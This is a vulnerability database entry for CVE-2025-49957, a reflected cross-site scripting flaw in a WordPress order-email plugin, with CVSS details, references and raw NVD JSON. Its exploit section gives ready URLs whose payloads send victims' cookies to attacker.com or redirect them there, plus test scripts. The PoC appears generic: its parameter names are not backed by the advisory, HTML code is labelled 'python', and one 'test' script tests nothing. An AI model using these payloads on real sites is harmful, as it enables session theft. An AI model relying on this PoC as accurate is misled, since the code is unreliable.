CVE-2025-49957

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Weboccult Technologies Pvt Ltd Email Attachment by Order Status & Products email-attachment-by-order-status-products allows Reflected XSS.This issue affects Email Attachment by Order Status & Products: from n/a through <= 1.0.1.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Email Attachment by Order Status & Products <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-49957 PoC - Reflected XSS in Email Attachment by Order Status & Products -->
<!-- Target: WordPress Plugin Email Attachment by Order Status & Products <= 1.0.1 -->
<!-- Attack Vector: Malicious URL with injected JavaScript in plugin's input parameters -->

<!-- 
Attack Scenario:
1. Attacker crafts a malicious URL with XSS payload in plugin parameters
2. Attacker tricks victim (site admin or user) into clicking the link
3. Victim's browser executes the injected JavaScript
4. Attacker steals session cookies or performs actions on behalf of victim
-->

<!-- Example PoC URLs (modify target domain): -->

<!-- PoC 1: Basic alert payload to test vulnerability -->
<!-- https://vulnerable-site.com/?order_id=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E -->

<!-- PoC 2: Cookie stealing payload -->
<!-- https://vulnerable-site.com/?order_id=%3Cimg%20src=x%20onerror=%22fetch%28%27https://attacker.com/log?c=%27+encodeURIComponent%28document.cookie%29%29%22%3E -->

<!-- PoC 3: Session hijacking with fetch API -->
<!-- https://vulnerable-site.com/?product_id=%3Cscript%3Edocument.location=%27https://attacker.com/steal?cookie=%27+document.cookie%3C/script%3E -->

<!-- JavaScript payload for automated testing: -->
<script>
// CVE-2025-49957 PoC Payload
var xss_payload = "<script>alert('CVE-2025-49957 XSS Vulnerability')</script>";
var malicious_url = window.location.origin + window.location.pathname + 
                     "?order_id=" + encodeURIComponent(xss_payload);
console.log("Testing XSS at: " + malicious_url);
document.write("<h3>XSS Test Payload Injected</h3>");
</script>

<!-- Detection Script: -->
<script>
function testCVE202549957() {
    const testPayload = "<img src=x onerror=alert('XSS-Test')>";
    const params = new URLSearchParams(window.location.search);
    
    // Check if plugin parameters are reflected without encoding
    ['order_id', 'product_id', 'status'].forEach(param => {
        if (params.has(param)) {
            const value = params.get(param);
            // Check if value appears in DOM without encoding
            if (document.body.innerHTML.includes(value) || 
                document.body.innerText.includes(value.replace(/<[^>]*>/g, ''))) {
                console.log("[VULN] Parameter '" + param + "' appears vulnerable to XSS");
            }
        }
    });
}
testCVE202549957();
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-49957
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-49957
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-49957/
[4] VulDB https://vuldb.com/cve/CVE-2025-49957
[5] https://patchstack.com/database/Wordpress/Plugin/email-attachment-by-order-status-products/vulnerability/wordpress-email-attachment-by-order-status-products-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-49957", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:42.270", "lastModified": "2026-04-28T19:33:16.100", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Weboccult Technologies Pvt Ltd Email Attachment by Order Status & Products email-attachment-by-order-status-products allows Reflected XSS.This issue affects Email Attachment by Order Status & Products: from n/a through <= 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/email-attachment-by-order-status-products/vulnerability/wordpress-email-attachment-by-order-status-products-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}